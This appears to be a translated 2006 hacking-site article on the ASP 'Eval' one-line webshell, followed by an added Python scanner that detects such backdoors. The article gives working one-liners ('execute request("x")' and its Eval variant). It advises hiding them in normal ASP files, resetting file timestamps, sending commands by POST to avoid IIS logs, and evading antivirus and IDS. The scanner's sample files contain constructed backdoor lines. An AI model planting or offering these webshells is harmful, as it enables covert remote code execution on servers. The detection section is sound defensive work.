More compact and more powerful: principle analysis of the Eval version of the ASP Trojan - vulnerability warning - the black bar safety net

ID MYHACK58:6220066573
Type myhack58
Reporter Anonymous (佚名)
Modified 2006-01-22T00:00:00


With the growing popularity of the Web, administrators' skill at preventing WebShells has also increased. The era of simply dropping a WebShell onto the server is slowly leaving us, so today's WebShells pay more and more attention to concealment. WebShell hiding techniques are also developing very fast, from changing the case of the code to the C/S (client/server) mode; all of them are the crystallization of clever people's wisdom. Speaking of the C/S mode, does it not make you think of the ASP one-line backdoor `Execute Request("#")`? Today I will also talk with you about an ASP one-line backdoor, but one that does not rely on Execute but on another function: Eval. First, let us go over the principle of the Eval backdoor and how it is used, so listen carefully.

Everyone knows that ASP has an Execute function specifically used to execute ASP code, similar to the eval function in JavaScript. So Execute can be used to make a one-line backdoor: `execute request("x")`. However, when the POSTed parameter x is empty, the Execute function raises an error, so you have to add an error-handling statement. Actually VBScript also has an Eval function; can it be used instead? Let us look at its description first:

The Eval function evaluates an expression and returns the result.

`[result = ] Eval(expression)`

Parameters:

result: Optional. A variable used to receive the returned result. If you do not specify a result, consider using the Execute statement instead.

expression: Required. A string that can contain any valid VBScript expression.

Tip: In VBScript, `x = y` can have two interpretations. The first is as an assignment statement, assigning the value of y to x. The second is as a test of whether x and y are equal: if they are equal, the result is True; otherwise the result is False. The Eval method always uses the second interpretation, whereas the Execute statement always uses the first.

Note that the parameter expression "can contain any valid VBScript expression string". Doesn't that imply Eval can execute arbitrary code? But look at the description: Eval always interprets an assignment statement as a comparison, so an assignment cannot be made through it. That does not matter, though: what if we have Eval execute an Execute, and let that Execute run the arbitrary code? That is the Eval backdoor! Compared with Execute, Eval has the advantage that it does not raise an error when the parameter is empty, so the shortest ASP backdoor to date is this Eval version. Count the characters: is it not shorter than the previous ones?

Insert the Eval function into a normal ASP file and your backdoor will stay well hidden; if you can also set the file's last-modified time back to what it was, even better. Now you can execute arbitrary code, and of course that code has to be sent up by the client via POST. A Web-based client is the most convenient. Haiyang Top has an Eval client that seems to use the session to save the code and then execute it, but I tried it several times without success, so I still had to write one myself. My client differs from Haiyang's: it is composed of separate functions, and each function uses one .htm page that corresponds to one section of code, placed in hidden fields on the page. The website structure references Ice Fox Prodigal's micro ASP backdoor client; thanks to him.

As said before, we have Eval execute an Execute to run the code. So the content of the hidden field looks like `execute("response.write(""Hello, World!""): response.write("" "")")`. Note that quotation marks inside the string must be doubled, and the code passed to Execute can separate statements with a carriage return/line feed or with a colon in place of the line break. This is still not enough: we also have to "chop off the head and the tail". Chopping the head means clearing the data output before our backdoor code executes; chopping the tail means ending the output after the backdoor code has run, so that no other useless data interferes with what we see returned. These are done with Response.Clear and Response.End respectively. After some chopping of head and tail, our hidden field becomes `response.clear:execute("response.write(""Hello, World!""): response.write("" ""):response.end")`.

By the way, last year a guru used a `#include` of a picture file to hide a backdoor; the picture ends with a section of ASP code. At the time, didn't people say that after the code executes it only displays the picture, with no echo? Actually there is an echo: save the picture, open it with a hex editor, and the returned content is at the end of the picture. Thinking about it, with Response.Clear you can clear the picture so that the echo shows directly.

The remaining task is to convert the ASP backdoor code and combine it with JavaScript in the HTML file; interested friends can look at the code, which I will not repeat here. In addition, the Execute backdoor can also use this client. The advantages of this backdoor are that it is small, highly concealed and not detected by antivirus, and that all submitted data goes by POST, which the IIS log does not record; the disadvantages are that each execution transmits a large amount of data, and code run through Execute is slower. Another advantage of executing code this way is that the POSTed code can be encrypted to bypass the IDS; more on that later.
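Because the article points out that the POST body never reaches the IIS log and that the file's modification time can be reset, the practical place for a defender to look for this backdoor is the content of the ASP files themselves. The following is an added example written for this page (not from the article or from any of the clients it mentions): a small Python scanner that walks a web root and flags lines where Eval, Execute or ExecuteGlobal is applied directly to a Request parameter, matching case-insensitively so that the case-changing trick mentioned at the start is caught too. The sample files and their contents are constructed for the demonstration.

```python
import re
from pathlib import Path

# Script extensions that IIS hands to the ASP engine by default.
ASP_EXTENSIONS = {".asp", ".asa", ".inc", ".cer", ".cdx"}

# Eval / Execute / ExecuteGlobal applied straight to a Request parameter
# (request("x"), request.form("x"), request.querystring("x")), with or
# without parentheses around the call. IGNORECASE covers case-mangled variants.
ONE_LINER_RE = re.compile(
    r"\b(eval|execute|executeglobal)\b\s*\(?\s*request(?:\.form|\.querystring)?\s*\(",
    re.IGNORECASE,
)

# Constructed sample files: two harmless, two carrying a one-line backdoor.
SAMPLE_FILES = {
    "index.asp": "<%\nDim name\nname = Request.Form(\"name\")\n"
                 "Response.Write Server.HTMLEncode(name)\n%>",
    "legit_eval.asp": "<% total = Eval(\"2 + 3\") %>",  # Eval of a literal, not of input
    "conn.asp": "<%\n' constructed: one-liner hidden inside a normal-looking file\n"
                "EvAl ReQuEsT(\"#\")\n%>",
    "upload.asp": "<% Execute Request(\"x\") %>",
}


def scan_source(text):
    """Return [(line_number, stripped_line)] for every suspicious line."""
    return [(n, line.strip()) for n, line in enumerate(text.splitlines(), 1)
            if ONE_LINER_RE.search(line)]


def scan_samples():
    """Scan the constructed samples; returns {filename: hits}."""
    return {name: scan_source(body) for name, body in SAMPLE_FILES.items()}


def scan_tree(root):
    """Walk a real web root and return {path: hits} for files with findings.
    File content is inspected, not the mtime, since a timestamp can be reset."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in ASP_EXTENSIONS:
            hits = scan_source(path.read_text(errors="replace"))
            if hits:
                findings[str(path)] = hits
    return findings


if __name__ == "__main__":
    for name, hits in scan_samples().items():
        print(f"{name}: {'SUSPICIOUS' if hits else 'clean'}")
        for line_no, line in hits:
            print(f"  line {line_no}: {line}")
```

The check is deliberately narrow: it only catches input handed directly to Eval or Execute on one line. A variant that stages the request parameter through a variable first would need the pattern extended, which is why content scanning is best paired with comparing the web root against a known-good copy rather than trusting file timestamps.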